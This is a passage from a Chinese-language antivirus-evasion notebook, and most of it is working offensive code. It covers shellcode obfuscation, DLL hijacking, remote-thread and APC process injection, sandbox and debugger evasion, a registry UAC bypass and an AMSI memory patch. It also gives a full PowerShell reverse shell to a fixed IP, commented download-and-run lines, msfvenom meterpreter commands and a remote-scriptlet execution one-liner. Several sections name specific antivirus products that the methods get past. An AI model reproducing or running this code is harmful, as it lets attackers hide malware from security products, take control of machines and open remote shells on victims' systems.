  97.         private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
  98.         [DllImport("kernel32")]
  99.         private static extern IntPtr GetModuleHandle(string moduleName);
  100.         [DllImport("kernel32")]
  101.         private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
  102.         [DllImport("kernel32")]
  103.         private static extern UInt32 LoadLibrary(string lpFileName);
  104.         [DllImport("kernel32")]
  105.         private static extern UInt32 GetLastError();
  106.         [DllImport("kernel32")]
  107.         static extern IntPtr GetConsoleWindow();
  108.         [DllImport("User32")]
  109.         private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
  110.     }
  111. }

字节替换

  1. //encrypt
  2. import sys
  3. def main(argv):
  4.     filename = argv[1]
  5.     with open(filename,"r") as f:
  6.         st = f.read()
  7.         s = st.split(" \"")[1].split("\";")[0].replace("\\x"," ")[1:]
  8.         tmp_1 = ""
  9.         tmp_2 = ""
  10.         s = s.split(" ")
  11.         for i in range(len(s)):
  12.             if i % 3 == 0:
  13.                 tmp_1 = tmp_1 + "\\x" + s[i]
  14.                 s[i] = "00"
  16.         t = "\\x".join(s)
  17.         print("unsigned char data[] = \"\\x"+t+"\";")
  18.         print("char a1[] = \""+tmp_1+"\";")
  20. if __name__ == "__main__":
  21.     main(sys.argv)
  1. //decrypt
  2. for (int i = 0; i < sizeof(a1); i++) {
  3.     memcpy(&data[i * 3], &a1[i], 1);
  4. }

Dll hijacking

通用 Dll 劫持技术 —-SuperHijacking

https://anhkgg.com/dllhijack/ https://github.com/anhkgg/anhkgg-tools Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图9

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图10

代码实现

  1. void* NtCurrentPeb()
  2. {
  3.     __asm {
  4.         mov eax, fs:[0x30];
  5.     }
  6. }
  7. PEB_LDR_DATA* NtGetPebLdr(void* peb)
  8. {
  9.     __asm {
  10.         mov eax, peb;
  11.         mov eax, [eax + 0xc];
  12.     }
  13. }
  14. VOID SuperDllHijack(LPCWSTR dllname, HMODULE hMod)
  15. {
  16.     WCHAR wszDllName[100] = { 0 };
  17.     void* peb = NtCurrentPeb();
  18.     PEB_LDR_DATA* ldr = NtGetPebLdr(peb);
  20. //InLoadOrderModuleList; 模块加载顺序
  21.     for (LIST_ENTRY* entry = ldr->InLoadOrderModuleList.Blink;
  22.         entry != (LIST_ENTRY*)(&ldr->InLoadOrderModuleList);
  23.         entry = entry->Blink) {
  24.         PLDR_DATA_TABLE_ENTRY data = (PLDR_DATA_TABLE_ENTRY)entry;
  26.         memset(wszDllName, 0, 100 * 2);
  27.         memcpy(wszDllName, data->BaseDllName.Buffer, data->BaseDllName.Length);
  29.         if (!_wcsicmp(wszDllName, dllname)) {
  30.             data->DllBase = hMod;
  31.             break;
  32.         }
  33.     }
  34. }
  35. VOID DllHijack(HMODULE hMod)
  36. {
  37.     TCHAR tszDllPath[MAX_PATH] = { 0 };
  39.     GetModuleFileName(hMod, tszDllPath, MAX_PATH);
  40.     PathRemoveFileSpec(tszDllPath);
  41.     PathAppend(tszDllPath, TEXT("mydll.dll.1"));
  43.     HMODULE hMod1 = LoadLibrary(tszDllPath);
  45.     SuperDllHijack(L"mydll.dll", hMod1);
  46. }
  47. BOOL APIENTRY DllMain( HMODULE hModule,
  48.                        DWORD  ul_reason_for_call,
  49.                        LPVOID lpReserved
  50.                      )
  51. {
  52.     switch (ul_reason_for_call)
  53.     {
  54.     case DLL_PROCESS_ATTACH:
  55.         DllHijack(hModule);
  56.         break;
  57.     case DLL_THREAD_ATTACH:
  58.     case DLL_THREAD_DETACH:
  59.     case DLL_PROCESS_DETACH:
  60.         break;
  61.     }
  62.     return TRUE;
  63. }

InLoadOrderModuleList 确认模块加载顺序

核心函数

  1. //向前遍历peb->ldr找到mydll.dll的ldrentry,然后修改dllbase为hMod
  2.     for (LIST_ENTRY* entry = ldr->InLoadOrderModuleList.Blink;
  3.         entry != (LIST_ENTRY*)(&ldr->InLoadOrderModuleList);
  4.         entry = entry->Blink) {
  5.         PLDR_DATA_TABLE_ENTRY data = (PLDR_DATA_TABLE_ENTRY)entry;
  7.         memset(wszDllName, 0, 100 * 2);
  8.         memcpy(wszDllName, data->BaseDllName.Buffer, data->BaseDllName.Length);
  10.         if (!_wcsicmp(wszDllName, dllname)) {
  11.             data->DllBase = hMod;
  12.             break;
  13.         }
  14.     }

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图11

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图12

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图13

Dll injection

总结: https://www.cnblogs.com/uAreKongqi/p/6012353.html

摘要

常见方法:

  • 创建新线程
  • 插入 Apc 队列
  • 手动实现 LoadLibrary
  • ~ 修改注册表~
  • ~ 挂钩窗口消息~
  • ~ 设置线程上下背景文,修改寄存器~

CreateRemoteThread(NewProcess)

Sysmon 对 Event ID 8: CreateRemoteThread 有监控

  1. STARTUPINFOEXA si;
  2. PROCESS_INFORMATION pi;
  4. ZeroMemory(&si, sizeof(si));
  5. si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
  6. si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
  8. BOOL success = CreateProcessA(
  9.         NULL,
  10.         (LPSTR)"C:\\Windows\\System32\\mblctr.exe",
  11.         NULL,
  12.         NULL,
  13.         true,
  14.         CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,
  15.         NULL,
  16.         NULL,
  17.         reinterpret_cast<LPSTARTUPINFOA>(&si),
  18.         &pi);
  19.     // Assign our attribute
  21.     HANDLE notepadHandle = pi.hProcess;
  22.     LPVOID remoteBuffer = VirtualAllocEx(notepadHandle, NULL, sizeof data, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
  24. WriteProcessMemory(notepadHandle, remoteBuffer, data, sizeof data, NULL);
  25.     HANDLE remoteThread = CreateRemoteThread(notepadHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
  27. if (WaitForSingleObject(remoteThread, INFINITE) == WAIT_FAILED) {
  28.     return 1;
  29. }

异步过程调用 (APC) 注入

  1. 概念 APC 可以看成就是内核里的定时器, 为了给自己一个在本函数返回后还能执行的一次机会, 有很多操作是需要在函数返回后才能执行, APC 类似于析构函数但不完全是.
  2. 特点 apc 的最大特点就是在本函数返回后才执行, 而且是在本线程中.

对于用户模式下的 APC 队列,当线程处在alertable状态时才去执行这些 APC 函数。因此,在 ring3 User-Mode 下最暴力的办法就是给每个线程设置成 alertable(遍历线程的时候从后往前遍历着插入就不会崩溃)

alertable “可唤醒的” SleepEx()——>KeDelayExecutionThread() WaitForSingleObject()——>KeWaitForSingleObject() WaitForMultipleObjects()——>KeWaitForMultipleObjects()

当上述调用发生时,线程 Alertable 被置为 TRUE。同时,还会通过宏 TestForAlertPending 设置 KTHREAD 的另外一个成员:UserApcPending,当 Alertable 为 TRUE,并且 User APC 队列不为空,那么该值将被置为 TRUE。

APC 注入分为内核(驱动)APC 注入 和 User-Mode APC 注入两种,在内核态进行 APC 注入时不需要考虑alertable

  1. 执行时间 apc 它的执行时机有多,比如在线程 wait、线程切换到应用层、线程被挂起等等等等, 而且 apc 也分几个层次的优先级. 就是说 apc 一般是不太需要立马执行的低优先级的函数。所以一旦线程有空隙了,windows 就会执行一下.
  1. string strShellCode = "[INSERT BASE64 SHELLCODE HERE]";
  2. byte[] shellcode = System.Convert.FromBase64String(strShellCode);
  4. STARTUPINFO si = new STARTUPINFO();
  5. PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
  6. bool success = CreateProcess(processpath, null, 
  7.                         IntPtr.Zero, IntPtr.Zero, false, 
  8.                         ProcessCreationFlags.CREATE_SUSPENDED, 
  9.                         IntPtr.Zero, null, ref si, out pi);
  12. IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
  13. IntPtr bytesWritten = IntPtr.Zero;
  14. bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
  16. IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
  17. uint oldProtect = 0;
  18. resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
  19. IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
  20. IntPtr ThreadHandle = pi.hThread;
  21. ResumeThread(ThreadHandle);

Block DLL(Create New Process)

https://www.anquanke.com/post/id/190344

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图14
 https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图15
 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图16

/Users/boi/Documents/Work/Security/Pentest/bypassAV/blockdll_ACG/

  1. STARTUPINFOEXA si;
  2. PROCESS_INFORMATION pi;
  3. policy.ProhibitDynamicCode = 1;
  5. ZeroMemory(&si, sizeof(si));
  6. si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
  7. si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
  9. // Get the size of our PROC_THREAD_ATTRIBUTE_LIST to be allocated
  10. InitializeProcThreadAttributeList(NULL, 1, 0, &size);
  12. // Allocate memory for PROC_THREAD_ATTRIBUTE_LIST
  13. si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
  14.     GetProcessHeap(),
  15.     0,
  16.     size
  17. );
  19. // Initialise our list 
  20. InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
  22. // Enable blocking of non-Microsoft signed DLLs
  23. DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
  25. // Assign our attribute
  26. UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL);

ACG(Arbitrary Code Guard)

阻止杀软进程 hook 我们的进程后在进程内部使用 VirtualAlloc 等函数修改内存空间 使其无法生成动态代码或修改现有的可执行代码.

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图17

  1. PROCESS_MITIGATION_DYNAMIC_CODE_POLICY acg_policy;
  2. ZeroMemory(&acg_policy, sizeof(acg_policy));
  3. acg_policy.ProhibitDynamicCode = 1;
  4. if (SetProcessMitigationPolicy(ProcessDynamicCodePolicy, &acg_policy, sizeof(acg_policy)) == false) {
  5.     MessageBoxA(NULL, "load testdll.dll error.", "error", MB_OK);
  6.     return 1;
  7. }

内存动态加载 DLL

https://github.com/fancycode/MemoryModule

虚拟机反调试

那么问题来了,如何对抗云沙箱的检测呢?我们知道,很多杀软都有自己的后端云沙箱,这些沙箱能够模拟出软件执行所需的运行环境,通过进程 hook 技术来对软件执行过程中的行为进行分析,判断其是否有敏感的操作行为,或者更高级的检测手法是,将获取到的程序的 API 调用序列以及其他的一些行为特征输入到智能分析引擎中(基于机器学习 org)进行检测。所以,如果我们的木马没有做好反调试,很容易就被沙箱检测出来。

最简单的反调试的措施就是检测父进程。一般来说,我们手动点击执行的程序的父进程都是 explore。如果一个程序的父进程不是 explor,那么我们就可以认为他是由沙箱启动的。那么我们就直接 exit 退出,这样,杀软就无法继续对我们进行行为分析了。具体的实现代码如下:

  1. DWORD get_parent_processid( DWORD pid )
  2. {
  3.     DWORD ParentProcessID = -1;
  5.     PROCESSENTRY32 pe;
  7.     HANDLE hkz;
  9.     HMODULE hModule = LoadLibrary( _T( "Kernel32.dll" ) );
  11.     FARPROC Address = GetProcAddress( hModule, "CreateToolhelp32Snapshot" );
  13.     if ( Address == NULL ){
  14.         OutputDebugString( _T( "GetProc error" ) );
  15.         return(-1);
  16.     }
  18.     _asm{
  19.         push 0
  20.         push 2
  21.         call Address
  22.         mov hkz, eax
  23.     }
  25.     pe.dwSize = sizeof(PROCESSENTRY32);
  27.     if ( Process32First( hkz, &pe ) ){
  28.         do{
  29.             if ( pe.th32ProcessID == pid ){
  30.                 ParentProcessID = pe.th32ParentProcessID;
  31.                 break;
  32.             }
  33.         }
  34.         while ( Process32Next( hkz, &pe ) );
  35.     }
  36.     returnParentProcessID;
  37. }
  40. DWORD get_explorer_processid(){
  41.     DWORD explorer_id = -1;
  42.     PROCESSENTRY32 pe;
  43.     HANDLE hkz;
  44.     HMODULE hModule = LoadLibrary( _T( "Kernel32.dll" ) );
  46.     if ( hModule == NULL ){
  47.         OutputDebugString( _T( "Loaddll error" ) );
  48.         return(-1);
  49.     }
  50.     FARPROCAddress = GetProcAddress( hModule, "CreateToolhelp32Snapshot" );
  52.     if ( Address == NULL ){
  53.         OutputDebugString( _T( "GetProc error" ) );
  54.         return(-1);
  55.     }
  57.     _asm{
  58.         push0
  59.         push2
  60.         callAddress
  61.             movhkz, eax
  62.     }
  64.     pe.dwSize = sizeof(PROCESSENTRY32);
  66.     if ( Process32First( hkz, &pe ) ){
  67.         do{
  68.             if ( _stricmp( pe.szExeFile, "explorer.exe" ) == 0 )
  69.             {
  70.                 explorer_id = pe.th32ProcessID;
  71.                 break;
  72.             }
  73.         }
  74.         while ( Process32Next( hkz, &pe ) );
  75.     }
  76.     returnexplorer_id;
  77. }
  80. void domain(){
  81.     DWORD explorer_id    = get_explorer_processid();
  82.     DWORD parent_id        = get_parent_processid( GetCurrentProcessId() );
  83.     if ( explorer_id == parent_id ){ /* 判断父进程id是否和explorer进程id相同{ */
  84.         dowork();
  85.     }
  86.     else  {
  87.     exit( 1 );
  88.     }
  89. }

这里主要的思路是获取调用 kernel32 库中的 CreateToolhelp32Snapshot 函数获得一个进程快照信息,然后从快照中获取到 explorer.exe 的进程 id 信息,然后通过当前进程的 pid 信息在进程快照中找到其父进程的 id 信息,最后将两者进行比较,判断当前进程是否是有人工启动的。

反调试的措施不仅仅是检测父进程,还可以通过调用 windows 的 API 接口 IsDebuggerPresent 来检查当前进程是否正在被调试。

TODO: 检测反调试的话,还可以通过检查进程堆的标识符号来实现,系统创建进程时会将 Flags 置为 0×02(HEAP_GROWABLE),将 ForceFlags 置为 0。但是进程被调试时,这两个标志通常被设置为 0x50000062h 和 0x40000060h。当然还可以利用特权指令 in eax,dx 来做免杀。

UAC

visual Studio 下设置 UAC 需求

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图18
/Users/boi/Desktop / 特征信息 / md

CompyterDefaults.exe

注意在 unicode 环境下,需要通过(PBYTE)&来转换CHAR *类型的字符串。 以及 GetModuleFileNameA 与 GetModuleFileName 的区别:字符串编码的区别

  1. //bypass UAC 高权限启动当前进程
  2. //GetModuleFileNameA: 获取当前文件完整路径
  3. #undef  _UNICODE
  4. #define _UNICODE
  5. #undef  UNICODE
  6. #define UNICODE
  7. #define _CRT_SECURE_NO_WARNINGS
  9. CHAR cwd[256];
  10. GetModuleFileNameA(NULL, cwd, sizeof(cwd));//"cmd.exe"
  11. LPCTSTR gname = "DelegateExecute";
  12. HKEY hkResult = NULL;
  13. int ret = RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command", &hkResult);
  14. ret = RegSetValueExA(hkResult, (const BYTE*)"DelegateExecute", 0, REG_SZ, "", 1);
  15. ret = RegSetValueExA(hkResult, NULL, 0, REG_SZ, (PBYTE)&cwd, strlen(cwd) + 1);
  16. RegCloseKey(hkResult);
  17. system("C:\\windows\\system32\\ComputerDefaults.exe");
  18. exit(1);

Other

C# 函数变换

https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp

  1. public static UInt32 funcAddr;
  2. [DllImport("kernel32")]
  3. public static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  6. public delegate UInt32 V(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  8. V v = Hide.code.b._classs.VirtualAlloc;
  10. Hide.code.b.funcAddr = v(0, (UInt32)Hide.code.a.ftp.Length, Hide.hide2.hide3.MMC, Hide.hide2.hide3.PERE);

go 内联免杀

360 + 火绒

  1. package main
  2. /*
  3. void call(char *code) {
  4. int (*ret)() = (int(*)())code;
  5. ret(); }
  6. */
  7. import "C"
  8. import "unsafe"
  9. func main() {
  10. buf := "cobaltstrike python shellcode(x86/x64)"
  11. shellcode := []byte(buf)
  12. C.call((*C.char)(unsafe.Pointer(&shellcode[0]))) }

AVIator

360 + 火绒

  1. https://github.com/Ch0pin/AVIator

AvIator360

cs + veil

360 + 火绒 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图19

  1. cs -> veil -> use 1 -> use 17 -> generate(bypass 360/火绒)
  2. sh-4.4# veil
  3. Veil>: use 1
  4. Veil/Evasion>: use 17 //如下图

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图20

  1. BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试)
  2. CLICKTRACK 设置为4表示 表示需要4次点击才会执行
  3. CURSORCHECK 设置为100表示 运行环境的硬盘大小如果大于100GB才会执行payload (反沙箱)
  4. COMPILE_TO_EXE 设置为Y表示 编译为exe文件
  5. HOSTNAME 设置为Comp1表示 只有在Hostname计算机名为Comp1时才会执行payload(指定目标环境 反沙箱的方式)
  6. INJECT_METHOD 可设置为Virtual  Heap
  7. MINPROCS 设置为20表示 只有运行环境的运行进程数大于20时才会执行payload(指定目标环境 反沙箱的方式)
  8. PROCCHECK 设置为Y表示 只有运行环境的进程中没有虚拟机进程时才会执行payload(指定目标环境 反沙箱的方式)
  9. PROCESSORS 设置为2表示 只在至少2核的机器中才会执行payload(指定目标环境 反沙箱的方式)
  10. RAMCHECK 设置为Y表示 只在运行环境的内存为3G以上时才会执行payload(指定目标环境 反沙箱的方式)
  11. SLEEP 设置为10表示 休眠10 以检测是否运行过程中被加速(反沙箱)
  12. USERNAME 设置为Tom表示 只有在当前用户名为Tom的机器中才执行payload
  13. USERPROMPT 设置为Y表示 injection之前提醒用户(提示一个错误框,让用户误以为该程序执行错误才无法打开)
  14. DEBUGGER 设置为Y表示 当被调试器不被attached时才会执行payload (反调试)
  15. DOMAIN 设置为Comp表示 受害者计算机只有加入Comp域中时,才会执行payload(指定目标环境 反沙箱的方式)
  16. UTCCHECK 设置为Y表示 只在运行环境的系统使用UTC时间时,才会执行payload
  1. [go/shellcode_inject/virtual>>]: generate
  2. >> 3

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图21

  1. [>] Please enter the base name for output files (default is payload): test

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图22

Simple-Loader 免杀 Defender

https://github.com/cribdragg3r/Simple-Loader

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图23

反弹 socket —- NativePayload_ReverseShell

  1. powershell -c "$client = New-Object Net.Sockets.TCPClient('172.16.76.1',12345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback +'> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

https://github.com/DamonMohammadbagher/NativePayload_ReverseShell Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图24

bypassAMSI

  1. # mov eax, 80070057h
  2. # ret
  3. Write-Host "-- AMSI Patch"
  4. Write-Host "-- Paul Laîné (@am0nsec)"
  5. Write-Host ""
  7. ${Kern`eL32} = @"
  8. using System;
  9. using System.Runtime.InteropServices;
  11. public class Kernel32 {
  12.     [DllImport("kernel32")]
  13.     public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  15.     [DllImport("kernel32")]
  16.     public static extern IntPtr LoadLibrary(string name);
  18.     [DllImport("kernel32")]
  19.     public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
  20. }
  21. "@
  23. Add-Type ${Kern`el32}
  24. [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
  25. ${A`DDRE`Ss} = [kernel32]::GetProcAddress($hModule, "Amsi"+"Scan"+"Buffer")
  26. ${p} = 0
  27. [kernel32]::VirtualProtect(${A`DdRes`S}, [uint32]5,0x40, [ref]${P})
  28. ${pat`ch} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
  30. If (${a`DDrEsS} -ne 0){
  31.     [System.Runtime.InteropServices.Marshal]::Copy(${p`AT`cH}, 0, ${A`DdR`eSs}, 6)
  32. }
  33. # $string = 'iex ((new-object net.webclient).downloadstring("http://192.168.214.129/amsi-bypass")); if([Bypass.AMSI]::Disable() -eq "0") { iex ((new-object net.webclient).downloadstring("http://192.168.214.129/stager")) }'

API 替换

如 CreateThreadEx 替换 CreateThread

Spoofing CommandLine Argument

https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/

  1. #include <iostream>
  2. #include <windows.h>
  3. #include <winternl.h>
  5. #define CMD_TO_SHOW "powershell.exe -NoExit -c Write-Host 'This is just a friendly argument, nothing to see here'"
  6. #define CMD_TO_EXEC L"powershell.exe -NoExit -c Write-Host Surprise, arguments spoofed\0"
  8. typedef NTSTATUS(*NtQueryInformationProcess2)(
  9. IN HANDLE,
  10. IN PROCESSINFOCLASS,
  11. OUT PVOID,
  12. IN ULONG,
  13. OUT PULONG
  14. );
  16. void* readProcessMemory(HANDLE process, void *address, DWORD bytes) {
  17. SIZE_T bytesRead;
  18. char *alloc;
  20. alloc = (char *)malloc(bytes);
  21. if (alloc == NULL) {
  22. return NULL;
  23. }
  25. if (ReadProcessMemory(process, address, alloc, bytes, &bytesRead) == 0) {
  26. free(alloc);
  27. return NULL;
  28. }
  30. return alloc;
  31. }
  33. BOOL writeProcessMemory(HANDLE process, void *address, void *data, DWORD bytes) {
  34. SIZE_T bytesWritten;
  36. if (WriteProcessMemory(process, address, data, bytes, &bytesWritten) == 0) {
  37. return false;
  38. }
  40. return true;
  41. }
  43. int main(int argc, char **canttrustthis)
  44. {
  45. STARTUPINFOA si;
  46. PROCESS_INFORMATION pi;
  47. CONTEXT context;
  48. BOOL success;
  49. PROCESS_BASIC_INFORMATION pbi;
  50. DWORD retLen;
  51. SIZE_T bytesRead;
  52. PEB pebLocal;
  53. RTL_USER_PROCESS_PARAMETERS *parameters;
  55. printf("Argument Spoofing Example by @_xpn_\n\n");
  57. memset(&si, 0, sizeof(si));
  58. memset(&pi, 0, sizeof(pi));
  60. // Start process suspended
  61. success = CreateProcessA(
  62. NULL, 
  63. (LPSTR)CMD_TO_SHOW, 
  64. NULL, 
  65. NULL, 
  66. FALSE, 
  67. CREATE_SUSPENDED | CREATE_NEW_CONSOLE,
  68. NULL, 
  69. "C:\\Windows\\System32\\", 
  70. &si, 
  71. &pi);
  73. if (success == FALSE) {
  74. printf("[!] Error: Could not call CreateProcess\n");
  75. return 1;
  76. }
  78. // Retrieve information on PEB location in process
  79. NtQueryInformationProcess2 ntpi = (NtQueryInformationProcess2)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtQueryInformationProcess");
  80. ntpi(
  81. pi.hProcess, 
  82. ProcessBasicInformation, 
  83. &pbi, 
  84. sizeof(pbi), 
  85. &retLen
  86. );
  88. // Read the PEB from the target process
  89. success = ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), &bytesRead);
  90. if (success == FALSE) {
  91. printf("[!] Error: Could not call ReadProcessMemory to grab PEB\n");
  92. return 1;
  93. }
  95. // Grab the ProcessParameters from PEB
  96. parameters = (RTL_USER_PROCESS_PARAMETERS*)readProcessMemory(
  97. pi.hProcess, 
  98. pebLocal.ProcessParameters, 
  99. sizeof(RTL_USER_PROCESS_PARAMETERS) + 300
  100. );
  102. // Set the actual arguments we are looking to use
  103. WCHAR spoofed[] = CMD_TO_EXEC;
  104. success = writeProcessMemory(pi.hProcess, parameters->CommandLine.Buffer, (void*)spoofed, sizeof(spoofed));
  105. if (success == FALSE) {
  106. printf("[!] Error: Could not call WriteProcessMemory to update commandline args\n");
  107. return 1;
  108. }
  110. /////// Below we can see an example of truncated output in ProcessHacker and ProcessExplorer /////////
  112. // Update the CommandLine length (Remember, UNICODE length here)
  113. DWORD newUnicodeLen = 28;
  115. success = writeProcessMemory(
  116. pi.hProcess, 
  117. (char *)pebLocal.ProcessParameters + offsetof(RTL_USER_PROCESS_PARAMETERS, CommandLine.Length), 
  118. (void*)&newUnicodeLen, 
  119. 4
  120. );
  121. if (success == FALSE) {
  122. printf("[!] Error: Could not call WriteProcessMemory to update commandline arg length\n");
  123. return 1;
  124. }
  126. // Resume thread execution*/
  127. ResumeThread(pi.hThread);
  128. }

签名伪造

Sigthief

修改资源文件

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图25

修改图标等资源文件的操作会改变文件的 MD5, 在某些情况下可以免杀一部分杀软, 如 360… Restorator Resource_Hacker

MSF

  1. 1  msfvenom -p windows/meterpreter/reverse_http-e x86/shikata_ga_nai -i 15 -b '\x00' PrependMigrate=true PrependMigrateProc=svchost.exe LHOST=[your remote ip addres] LPORT=[listeningport] -f c >hacker.c
  3. 2  msfvenom -p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai -i 15 -b '\x00' PrependMigrate=true PrependMigrateProc=svchost.exe LHOST=[your remote ip addres]LPORT=[listening port] -f c >hacker.c
  5. 3  msfvenom -p windows/meterpreter/reverse_tcp_rc4 -e x86/shikata_ga_nai -i 15 -b '\x00' PrependMigrate=true PrependMigrateProc=svchost.exe LHOST=[your remote ip addres]LPORT=[listening port] -f c >hacker.c

-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai编码 15 次,而PrependMigrate=true PrependMigrateProc=svchost.exe使这个程序默认会迁移到 svchost.exe 进程

另外使用 revers_tcp_rc4 可以对回话进行加密,对免杀有一定帮助

pubprn.vbs*

  1. cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct

隐藏窗口

  • wmain 创建窗口项目
  • 命令参数
  1. #pragma comment(linker, "/subsystem:windows /entry:mainCRTStartup" )
  • powershell
  1.  Start-Process "C:`z\Windows\System32\cmd.exe" -Window Hidden
  • C#
  1. var handle = GetConsoleWindow();
  2. ShowWindow(handle, SW_HIDE);

参考资料

https://ired.team/offensive-security/code-injection-process-injection/process-injection

https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/

https://github.com/3gstudent/Inject-dll-by-APC/blob/master/test.cpp

https://github.com/wbenny/injdrv

https://github.com/DarthTon/Blackbone/blob/43bc59f68dc1e86347a76192ef3eadc0bf21af67/src/BlackBoneDrv/Loader.c (ring0 驱动)

https://xz.aliyun.com/t/4191

https://github.com/Veil-Framework/Veil

https://github.com/cribdragg3r/Simple-Loader

https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/

https://j00ru.vexillium.org/syscalls/nt/64/

https://github.com/theevilbit/injection/blob/d166564e692d34c29620658a2102268bc9e640b1/InjectDLL/InjectDLL/InjectDLL.cpp

https://github.com/theevilbit/injection/blob/598e77b726925153079384114fa6f599a8b84995/SimpleThreadInjection/SimpleThreadInjection/SimpleThreadInjection.cpp

https://blog.xpnsec.com/

https://github.com/klionsec/BypassAV-AllThings

https://github.com/Techryptic/AV_Bypass

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH1/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%201.pdf

https://github.com/Hackplayers/Salsa-tools

https://www.anquanke.com/post/id/190344

https://www.freebuf.com/column/135314.html

https://modexp.wordpress.com/2015/11/19/dllpic-injection-on-windows-from-wow64-process/

http://deniable.org/misc/inject-all-the-things

https://github.com/theevilbit/injection

https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html

https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/

https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h

https://ired.team/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon

https://ired.team/offensive-security/code-injection-process-injection/process-injection

https://github.com/stormshadow07/HackTheWorld

https://github.com/diegslva/BypassUA

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://github.com/sailay1996/Fileless_UAC_bypass_WSReset

https://www.activecyber.us/activelabs/windows-uac-bypass
https://github.com/Airboi/bypass-av-note